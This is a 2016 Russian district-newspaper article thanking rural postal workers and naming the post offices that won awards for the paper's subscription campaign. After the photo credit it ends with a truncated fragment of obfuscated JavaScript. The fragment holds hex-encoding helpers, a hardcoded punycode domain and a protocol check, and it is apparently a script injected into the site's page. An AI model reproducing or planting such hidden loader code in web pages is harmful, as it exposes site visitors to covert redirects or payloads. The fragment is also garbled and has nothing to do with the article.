Опубликовано на: Вс, Мар 6th, 2016

Профессия важная и нужная

Поделиться этой

Почтальон – незаменимый человек,  особенно в сельской местности. Улыбчивых разносчиков пенсий и пособий, корреспонденции, бандеролей, переводов и периодических изданий  ждут почти в каждом доме. Никакая техника сегодня не может заменить  почтальона.

Начальники почтовых отделений связи: (слева направо) Н.И. Кирьянцева, Н.Г. Барнёва, Л.В. Бородина, Г.И. Бархатова, О.А. Берсенёва, Т.В. Жолудева, коллективы которых заняли первые, вторые и третьи места в соревновании на лучшего распространителя районной газеты

Начальники почтовых отделений связи: (слева направо) Н.И. Кирьянцева, Н.Г. Барнёва,
Л.В. Бородина, Г.И. Бархатова, О.А. Берсенёва, Т.В. Жолудева, коллективы которых заняли
первые, вторые и третьи места в соревновании на лучшего распространителя районной газеты

На этой беспокойной должности в нашем районе работают  обязательные, старательные, отзывчивые и приветливые люди. Кроме того, они ещё и хорошие психологи.  Они  постараются  выделить  минутку – другую, чтобы побеседовать с  бабулечками и  мамочками, замотанными домашними делами,  добрым словом поднимут настроение и обязательно улыбнутся на прощание.

На встречу с  работниками  Казанского почтамта,  начальниками почтовых отделений связи  в минувший вторник пришли   директор  информационно-издательского центра «Наша жизнь» С.В. Бессмельцева и ответственный секретарь районной газеты Н.В. Ростовщикова. Они поблагодарили работников почты и в их лице и всех почтальонов района (а это  в основном  женщины) за труд и старание, за плодотворное  сотрудничество и неоценимую помощь в проведении  подписных  кампаний, а также поздравили почтовиков с наступлением весны и Международным женским днём. Кстати, такие встречи проходят ежегодно уже не один  десяток  лет.

Главный редактор ИИЦ «Наша жизнь» С.В. Бессмельцева (справа) вручает начальнику Казанского отделения почтовой связи Н.И. Кирьянцевой премию за высокие показатели работы её коллектива в период подписной кампании

Главный редактор ИИЦ «Наша жизнь» С.В. Бессмельцева
(справа) вручает начальнику Казанского отделения почтовой
связи Н.И. Кирьянцевой премию за высокие показатели работы
её коллектива в период подписной кампании

По итогам соревнования  среди  почтовых отделений  по распространению   районной  газеты   на  первое  полугодие текущего года   победителем вышло  Казанское почтовое отделение (начальник  ОПС   Надежда Ивановна Кирьянцева).  На втором месте – Афонькинское отделение почтовой связи  (начальник  Людмила Викторовна Бородина) и на третьем – Огнёвское ОПС  (начальник  Наталья Григорьевна Барнёва).  Также в этот же день чествовали тех, кто сохранил или даже увеличил количество  подписчиков  районки  на второе  полугодие   прошлого года. Это Чирковское отделение почтовой связи (начальник  Галина Ивановна Бархатова), Пешнёвское ОПС  (начальник  Татьяна Владимировна Жолудева) и Смирновское ОПС  (начальник  Ольга Анатольевна Берсенёва).

Без сомнения, ваш труд, дорогие почтовики, заслуживает самых высоких слов благодарности. Спасибо вам за вашу преданность выбранной профессии и за то, что вкладываете в работу частичку своей души!

 

Фото автора

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "xn--72-6kca4agg0bf9h2b.xn--p1ai"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Об Авторе